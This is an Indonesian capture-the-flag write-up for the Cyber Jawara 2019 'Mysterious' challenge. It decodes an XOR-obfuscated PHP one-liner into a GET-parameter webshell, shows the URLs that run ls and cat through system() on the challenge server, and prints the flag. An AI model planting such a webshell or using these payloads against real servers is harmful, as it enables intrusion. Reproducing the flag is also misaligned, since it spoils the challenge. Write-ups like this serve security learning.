[Cyber Jawara 2019 Qualification] – Mysterious

Link soal: http://203.34.119.237:50000/shell.php

Diberikan soal sebagai berikut:

Kita mendapatkan file code sebagai berikut:

Hal pertama yang kita lakukan adalah mencoba untuk membuka link soal tersebut dan kita hanya mendapatkan halaman kosong.

Kemudian kita mencoba untuk mengartikan maksud dari code yang dikasih dari soal tadi.

Setelah kita mencoba untuk membacanya, kita mendapati bahwa code tersebut terbagi menjadi 2 bagian yaitu:

  1. $_=”{{{“^”?<>/”;
  2. ${$_}[$_](${$_}[_._._._]);

Pada bagian pertama, dapat kita lihat bahwa terdapat symbol ^ yang adalah tanda XOR.

Kita harus melakukan XOR string yang berada diantara “” yaitu: {{{ dengan ?<>/

Hasil yang kita dapatkan adalah _GET (kita melakukan XOR di http://xor.pw/)

Kita berhasil mengartikan code baris pertama yaitu –> $_ = _GET

Hal selanjutnya yang harus kita lakukan adalah mengartikan code di barisan kedua.

  1. ${$_} menjadi $_GET
  2. [$_] menjadi [_GET]
  3. [_._._._] menjadi ____ –> . di sini berfungsi sebagai concat

Hasil akhirnya adalah: $_GET[_GET]($_GET[____]);

Di sini kita mendapatkan 2 GET, sehingga kita bisa melakukan webshell.

Langkah selanjutnya yang kita lakukan adalah memasukkan payload http://203.34.119.237:50000/shell.php?_GET=system&____=ls

Kita mendapatkan hasil seperti di atas. Selanjutnya kita mencoba untuk membuka file flag.65a7d7e0c97b5cad0cd8e28c2823fc8c.txt tersebut dengan menggunakan payload http://203.34.119.237:50000/shell.php?_GET=system&____=cat%20flag.65a7d7e0c97b5cad0cd8e28c2823fc8c.txt

Dan kita berhasil mendapatkan flagnya

FLAG: CJ2019{shell_or_no_shell_that_is_the_question}

Leave a Reply

Your email address will not be published. Required fields are marked *